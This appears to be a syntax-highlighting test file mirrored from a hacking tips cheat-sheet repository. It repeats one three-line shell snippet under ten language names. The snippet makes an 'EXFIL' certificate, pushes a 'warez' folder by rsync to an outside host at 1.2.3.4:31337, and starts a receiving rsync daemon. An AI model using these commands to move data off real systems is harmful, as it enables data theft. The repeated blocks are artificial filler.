mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 20:53:43 +02:00
2.3 KiB
2.3 KiB
applescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
elixir
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
julia
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
livescript
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
pgsql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
php
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
powershell
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
r
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
ruby
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach
sql
# this is a comment
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
rsync -av warez rsync://1.2.3.4:31337/up
rsync --daemon --port=31337 --config=r.conf --no-detach